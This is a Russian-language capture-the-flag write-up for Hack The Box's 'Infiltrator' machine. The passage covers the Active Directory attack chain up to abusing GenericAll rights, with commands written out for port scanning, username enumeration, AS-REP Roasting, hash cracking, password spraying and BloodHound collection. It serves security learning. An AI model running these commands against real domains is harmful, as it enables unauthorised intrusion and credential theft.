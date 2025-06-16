Мы про­ведем клас­сичес­кий сбор дан­ных в Active Directory и через цепоч­ку раз­решений ском­про­мети­руем учет­ную запись, с которой получим сес­сию на хос­те. Затем извле­чем дан­ные из мес­сен­дже­ра, вскро­ем при­ложе­ние на .NET и про­экс­плу­ати­руем пла­ниров­щик задач для получе­ния слу­жеб­ной учет­ной записи. Повысим при­виле­гии через тех­нику ESC4 для служ­бы ADCS.

На­ша цель — получе­ние прав супер­поль­зовате­ля на машине Infiltrator с учеб­ной пло­щад­ки Hack The Box. Уро­вень слож­ности задания — «безум­ный».

warning Под­клю­чать­ся к машинам с HTB рекомен­дует­ся с при­мене­нием средств ано­ними­зации и вир­туали­зации. Не делай это­го с компь­юте­ров, где есть важ­ные для тебя дан­ные, так как ты ока­жешь­ся в общей сети с дру­гими учас­тни­ками.

Разведка

Сканирование портов

До­бав­ляем IP-адрес машины в / etc/ hosts :

10. 10. 11. 31 infiltrator. htb

И запус­каем ска­ниро­вание пор­тов.

Справка: сканирование портов Ска­ниро­вание пор­тов — стан­дар­тный пер­вый шаг при любой ата­ке. Он поз­воля­ет ата­кующе­му узнать, какие служ­бы на хос­те при­нима­ют соеди­нение. На осно­ве этой информа­ции выбира­ется сле­дующий шаг к получе­нию точ­ки вхо­да. На­ибо­лее извес­тный инс­тру­мент для ска­ниро­вания — это Nmap. Улуч­шить резуль­таты его работы ты можешь при помощи сле­дующе­го скрип­та: #!/ bin/ bash ports = $( nmap -p- --min-rate = 500 $1 | grep ^[ 0- 9] | cut -d '/ ' -f 1 | tr ' ' ', ' | sed s/, $/ / ) nmap -p $ports -A $1 Он дей­ству­ет в два эта­па. На пер­вом про­изво­дит­ся обыч­ное быс­трое ска­ниро­вание, на вто­ром — более тща­тель­ное ска­ниро­вание, с исполь­зовани­ем име­ющих­ся скрип­тов (опция -A ).

Ска­нер нашел 13 откры­тых пор­тов:

80 (HTTP) — веб‑сер­вер Microsoft IIS/10.0;

88 — Kerberos;

135 — Microsoft RPC;

139 — NetBIOS, NetLogon;

389 — LDAP;

445 — SMB;

464 — служ­ба сме­ны пароля Kerberos;

593 (HTTP-RPC-EPMAP) — исполь­зует­ся в служ­бах DCOM и MS Exchange;

636 — LDAP с шиф­ровани­ем SSL или TLS;

3268 (LDAP) — для дос­тупа к Global Catalog от кли­ента к кон­трол­леру;

3269 (LDAPS) — для дос­тупа к Global Catalog от кли­ента к кон­трол­леру через защищен­ное соеди­нение;

3389 — служ­ба уда­лен­ного рабоче­го сто­ла;

5985 — служ­ба уда­лен­ного управле­ния WinRM.

До­бавим в / etc/ hosts еще и пол­ное имя машины, а затем нач­нем раз­ведку с изу­чения сай­та.

10. 10. 11. 31 infiltrator. htb dc01. infiltrator. htb dc01

Точка входа

На сай­те находим спи­сок сот­рудни­ков. Выписы­ваем их в отдель­ный файл.

С помощью сле­дующе­го скрип­та мы можем сос­тавить спи­сок воз­можных учет­ных записей в домене.

import sys if len ( sys . argv ) == 1 : print ( " Usage: " + sys . argv [ 0 ] + " < usernames. txt> " ) sys . exit ( 1 ) names = open ( sys . argv [ 1 ] , " r " ) . read () . strip () . split ( ' \ n ' ) list = [ ] for name in names : n1 , n2 = name . split ( ' ' ) list . append ( n1 ) list . append ( n1 + n2 ) list . append ( n1 + " . " + n2 ) list . append ( n1 + " - " + n2 ) list . append ( n1 + " _ " + n2 ) list . append ( n1 + n2 [ 0 ] ) list . append ( n1 + " . " + n2 [ 0 ] ) list . append ( n1 + " - " + n2 [ 0 ] ) list . append ( n1 + " _ " + n2 [ 0 ] ) list . append ( n2 [ 0 ] + n1 ) list . append ( n2 [ 0 ] + " . " + n1 ) list . append ( n2 [ 0 ] + " - " + n1 ) list . append ( n2 [ 0 ] + " _ " + n1 ) list . append ( n2 ) list . append ( n2 + n1 ) list . append ( n2 + " . " + n1 ) list . append ( n2 + " - " + n1 ) list . append ( n2 + " _ " + n1 ) list . append ( n2 + n1 [ 0 ] ) list . append ( n2 + " . " + n1 [ 0 ] ) list . append ( n2 + " - " + n1 [ 0 ] ) list . append ( n2 + " _ " + n1 [ 0 ] ) list . append ( n1 [ 0 ] + n2 ) list . append ( n1 [ 0 ] + " . " + n2 ) list . append ( n1 [ 0 ] + " - " + n2 ) list . append ( n1 [ 0 ] + " _ " + n2 ) for n in list : print ( n )

python3 getusers. py team. txt > pos_ users. txt

Те­перь мож­но исполь­зовать инс­тру­мент Kerbrute для опре­деле­ния учет­ных записей, которые реаль­но сущес­тву­ют в домене. Дело в том, что Kerberos воз­вра­щает раз­ные коды оши­бок для сущес­тву­ющей и несущес­тву­ющей учет­ных записей.

kerbrute_ linux_ amd64 userenum -d infiltrator. htb --dc dc01. infiltrator. htb pos_ users. txt

Имея спи­сок дей­стви­тель­ных учет­ных записей, мож­но про­вес­ти ата­ку AS-REP Roasting. Если в UAC поль­зовате­ля уста­нов­лен флаг «Без пред­варитель­ной про­вер­ки под­линнос­ти Kerberos», то мы можем получить TGT-билет поль­зовате­ля без вер­ного пароля, а затем сбру­тить пароль офлайн.

GetNPUsers. py -dc-ip 10. 10. 11. 31 infiltrator. htb/ -usersfile users. txt -no-pass

По­луча­ем хеш поль­зовате­ля L.Clark и можем его проб­рутить с помощью hashcat. Затем валиди­руем учет­ные дан­ные через NetExec.

hashcat hash. txt rockyou. txt

nxc smb 10. 10. 11. 31 -u 'L. Clark' -p 'WAT?watismypass!'

По­лучив валид­ные логин и пароль, собира­ем информа­цию из домена. Пер­вым делом получа­ем спи­сок всех поль­зовате­лей.

nxc smb 10. 10. 11. 31 -u 'L. Clark' -p 'WAT?watismypass!' --users

В опи­сании одной учет­ной записи есть стро­ка, похожая на пароль. Сох­раня­ем всех юзе­ров в файл и про­буем исполь­зовать най­ден­ную стро­ку как пароль для дру­гих акка­унтов.

nxc smb 10. 10. 11. 31 -u users. txt -p passwords. txt --continue-on-success

На некото­рых учет­ных записях получа­ем ошиб­ку STATUS_ACCOUNT_RESTRICTION , а зна­чит, пов­торим перебор, но теперь с исполь­зовани­ем аутен­тифика­ции Kerberos.

nxc smb DC01. infiltrator. htb -u users. txt -p passwords. txt -k --continue-on-success

Ошиб­ка сме­нилась на KRB_AP_ERR_SKEW , а зна­чит, нам нуж­но син­хро­низи­ровать вре­мя на локаль­ной машине с сер­вером.

sudo timedatectl set- ntp false sudo ntpdate -s 10. 10. 11. 31

Точка опоры

У нас есть нес­коль­ко уче­ток, приш­ло вре­мя соб­рать базу дан­ных BloodHound. Для сбо­ра дан­ных с исполь­зовани­ем инс­тру­мен­тария под Linux нам нужен рабочий DNS-сер­вер, одна­ко иног­да до него мож­но не дос­тучать­ся. Поэто­му мы раз­вернем свой при помощи скрип­та DNSChef.

Справка: BloodHound Ути­лита BloodHound исполь­зует теорию гра­фов для выяв­ления скры­тых и зачас­тую неп­редна­мерен­ных вза­имос­вязей в сре­де Active Directory. Ее мож­но исполь­зовать, что­бы лег­ко иден­тифици­ровать очень слож­ные пути ата­ки.

Пер­вым делом нам нуж­но соз­дать кон­фиг infiltrator. txt , в котором дол­жны быть стан­дар­тные для любого домена записи DNS.

[A] *. infiltrator. htb=10. 10. 11. 31 [SRV] _ ldap. _ tcp. pdc. _ msdcs. infiltrator. htb=0 5 389 infiltrator. htb _ ldap. _ tcp. gc. _ msdcs. infiltrator. htb=0 5 389 infiltrator. htb _ kerberos. _ tcp. dc. _ msdcs. infiltrator. htb=0 5 88 infiltrator. htb

За­тем отклю­чаем сис­темный резол­вер и запус­каем свой DNS-сер­вер.

sudo systemctl stop systemd- resolved

python3 dnschef. py --file . / infiltrator. txt

За­тем исполь­зуем скрипт bloodhound-ce для сбо­ра дан­ных BloodHound. Пос­ле завер­шения работы скрип­та не забыва­ем отклю­чить DNSChef и сно­ва акти­виро­вать systemd-resolved .

python3 bloodhound. py -d 'infiltrator. htb' -u 'L. Clark' -p 'WAT?watismypass!' -c All -ns 127. 0. 0. 1 -dc DC01. infiltrator. htb --use-ldap --zip --auth-method ntlm

sudo systemctl start systemd- resolved

Стро­им граф от поль­зовате­ля D. ANDERSON .

Поль­зователь D. ANDERSON име­ет пра­во GenericAll на под­разде­ление MARKETING DIGITAL , где сос­тоит поль­зователь E. RODRIGUEZ . Это пра­во поз­воля­ет нам наз­начить любые пра­ва для всех чле­нов под­разде­ления. С помощью скрип­та dacledit из пакета Impacket даем поль­зовате­лю D. ANDERSON пол­ные пра­ва на всех чле­нов MARKETING DIGITAL .